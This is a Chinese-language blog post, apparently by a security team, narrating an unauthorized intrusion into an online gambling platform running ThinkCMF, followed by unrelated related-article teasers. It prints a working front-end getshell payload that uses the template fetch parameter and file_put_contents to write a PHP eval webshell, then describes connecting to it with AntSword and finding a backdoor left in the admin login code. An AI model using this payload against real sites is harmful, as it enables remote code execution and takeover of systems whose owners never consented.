渗透小计之「竟然有人在wangle平台代码里下毒」

访客4年前黑客工具758

print by 猩猩安全团队——作者:hurnme、flyingdemon

引言

记一次对某网D平台的渗透,以及发现其后台源码存在后门的过程

确定目标CMS

拿到其ip之后先信息搜集搜了了一波,确定目标使用的是ThinkCMF。

进去之后在url处构造报错

写入一句话

查看到ThinkPHP版本崴3.2.3,那么对应的thinkCMF版本应该存在前台getshell的洞。废话不多说,直接构造payload一发入魂。

?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('shell.php','<?php @eval($_POST[" ***  *** 521"]);?>')</php>

写入shell之后连接蚁剑,直接拿下

鄙人在渗透的过程中一直有一个习惯,那就是无论如何都要拿到后台管理员权限,不拿后台权限就浑身不得劲,即使拿下了主机,也是吃嘛嘛不香。没拿到后台就拿下主机,那和没确定关系就 *** 有什么区别!

进入♂后台

一开始的思路是读取其config.php文件连接他的数据库,在拿到了数据库账号和密码的时候怎么连也连不上去,小伙伴提供了另一条思路,修改后台登录逻辑,直捣黄龙。

正在我要修改后台登录逻辑的时,浏览代码的过程中无意之中发现了一个好玩的线索。

这。。。这TM。。。有人在代码里下毒。

拿着不知道是哪位好心人留下的后门,含泪登录了后台。

帮这个主机免费做了一次入侵检测,没有发现我们进入之前被入侵的痕迹,盲猜可能是这个平台自带后门。


相关文章

网络最菜黑客指南下载(最简单的黑客)

网络最菜黑客指南下载(最简单的黑客)

本文导读目录: 1、谁知道世界最强的[‘黑客’防火墙]和[防毒墙]是什么?下载地址是什么? 2、黑客零起点网络手册 3、网络安全中常见的黑客攻击方式? 4、《黑客成长史》最新txt全集下载...

我不是黑客的黑客神马行(我是个黑客)

我不是黑客的黑客神马行(我是个黑客)

本文导读目录: 1、我想做黑客。不是骇客。请位老师 2、我不是黑客ⅱ电子书txt全集下载 3、黑客是什么 4、为什么我不是黑客 5、我想变成一名黑客(不是骇客)应该怎么做呢? 6、...

大红袍属于什么茶?大红袍的功效与作用

大红袍属于什么茶?大红袍的功效与作用

大红袍属于什么茶 大红袍是什么茶?乌龙之珍品,茶叶之王的大红袍产于福建省武夷山,属于武夷岩茶的一种,为乌龙茶类。其茶树生长在岩缝之中,具有绿茶的清香,红茶的甘醇。大红袍具有保护牙齿、提神益思、生津利...

警方通报一家四口同日死亡案-一家四口同日死亡警方被指拒开死亡证明

近日关于连云港市一家四口同日死亡的事件让很多人关注起来,不少人都很惊讶是什么原因让一家人同日去世,对此警方通报一家四口同日死亡案,并且有消息称一家四口同日死亡警方被指拒开死亡证明,那么这个一家四口死亡...

品牌布局:如何用策略中心做市场分析?

品牌布局:如何用策略中心做市场分析?

对于TOP品牌来说,市场分析是一个很重要的一部分,有着预测市场趋势的能力。那么如何做市场分析呢?我们可以通过策略中心及数据银行来指导品牌进行新品布局! 之前有简单介绍过策略中心的功能和价值: 与数据...

聊天记录如何恢复(聊天记录如何恢复微信)

聊天记录如何恢复(聊天记录如何恢复微信)对于很多人来说,手机中的微信可是现在最离不开的软件之一,在微信中有非常多对我们来说很重要的东西,像聊天记录这种东西可是非常重要的。但是也有不少的小伙伴像小编一样...